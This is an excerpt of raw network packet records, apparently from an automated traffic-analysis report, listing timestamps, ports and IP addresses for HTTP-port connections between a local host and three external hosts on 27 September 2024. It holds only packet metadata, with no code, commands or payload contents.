                                                                          Sep 27, 2024 04:21:15.395581007 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.395620108 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.395620108 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.395644903 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.395657063 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.395667076 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.395692110 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.395714998 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.396393061 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.396430969 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.396471977 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.396471977 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.398655891 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.398756027 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.425359964 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.425373077 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.425384998 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.425445080 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.425457001 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.425466061 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.425478935 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.425482035 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.425489902 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.425543070 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.425594091 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.425605059 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.425622940 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.425632000 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.425649881 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.425676107 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.437722921 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.437742949 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.437799931 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.437833071 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.437844992 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.437855005 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.437911034 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.437911987 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.437930107 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.437939882 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.437989950 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.455511093 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.455542088 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.455553055 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.455579996 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.455607891 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.455630064 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.455647945 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.455660105 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.455672026 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.455674887 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.455698967 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.455707073 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.455714941 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.455725908 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.455732107 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.455765963 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.467818022 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.467828035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.467839003 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.467852116 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.467864990 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.467875957 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.467885971 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.467894077 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.467921972 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.467930079 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.467952013 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.467963934 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.467995882 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.468147039 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468172073 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468182087 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468199015 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.468224049 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.468241930 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468254089 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468265057 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468275070 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468287945 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.468306065 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.468332052 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.468360901 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468372107 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468384981 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468410015 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.468432903 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.468645096 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468660116 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468672037 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468698978 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.468712091 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468724012 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468724966 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.468739986 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468750954 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.468760967 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468769073 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.468790054 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.468807936 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.468816996 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468828917 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.468856096 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.468873978 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.469012976 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469055891 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469063044 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.469067097 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469091892 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.469109058 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.469145060 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469156981 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469167948 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469178915 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469187975 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.469204903 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.469213009 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469223976 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469229937 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469234943 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.469266891 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.469460011 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469496012 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469504118 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.469508886 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469538927 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.469573975 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469585896 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469597101 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469619036 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.469633102 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.469708920 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469721079 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469729900 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469741106 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469752073 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469763994 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.469767094 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469793081 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.469805002 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.469927073 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469938040 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469948053 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469958067 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469969034 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469978094 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.469980955 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.469994068 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470005035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470155954 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.470155954 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.470155954 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.470499992 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470511913 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470523119 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470582962 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.470582962 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.470604897 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470618010 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470629930 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470640898 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470663071 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.470688105 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.470706940 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470717907 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470727921 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470738888 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470751047 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470763922 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.470799923 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.470799923 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.470913887 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470923901 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470933914 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470946074 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470958948 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470972061 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470971107 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.470983982 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.470993996 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.470998049 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.471019983 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.471051931 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.471415997 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.471460104 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.471471071 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.471482038 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.471515894 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.471515894 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.471519947 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.471533060 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.471565008 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.471596956 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.485954046 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.486021042 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.486062050 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.486062050 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.512022972 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:15.512056112 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:15.512109041 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:15.512109041 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:15.513345003 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:15.516045094 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.516062975 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.516073942 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.516100883 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.516114950 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.516117096 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.516129017 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.516155005 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.516164064 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.516175032 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.516184092 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.516197920 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.516210079 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.516232967 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.516232967 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.516232967 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.516252995 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.516262054 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.516300917 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.516323090 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.516335964 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.516346931 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.516364098 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.516387939 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.516388893 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.516431093 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.516455889 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.516501904 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.518160105 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:15.518385887 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.518518925 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.518542051 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.518564939 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.518564939 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.518579006 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.518614054 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.518618107 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.518629074 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.518631935 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.518651962 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.518665075 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.518680096 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.518680096 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.518680096 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.518704891 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.518718958 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.518745899 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.518745899 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.518759966 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.518923044 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.518939018 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.518956900 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.518969059 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.518976927 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.518976927 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.518980980 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.519000053 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.519126892 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.519273996 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.519284010 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.519294977 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.519319057 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.519350052 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.519361973 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.519371986 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.519395113 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.519395113 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.519401073 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.519412994 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.519431114 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.519443989 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.519460917 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.519460917 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.519484043 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.520055056 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.520080090 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.520091057 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.520121098 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.520121098 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.520174026 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.520184994 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.520201921 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.520206928 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.520215034 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.520221949 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.520241022 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.520283937 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.520672083 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.520684004 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.520694017 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.520724058 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.520744085 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.520755053 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.520766973 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.520778894 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.520790100 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.520813942 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.520813942 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.520823956 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.520834923 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.520849943 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.520863056 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.520863056 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.520896912 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.520896912 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.521620035 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.521631002 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.521642923 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.521682978 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.521729946 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.528557062 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.528587103 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.528603077 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.528640032 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.528672934 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.528686047 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.528697014 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.528708935 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.528721094 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.528737068 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.528774023 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.528774023 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.546684980 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.546696901 CEST8049724176.113.115.95192.168.2.5
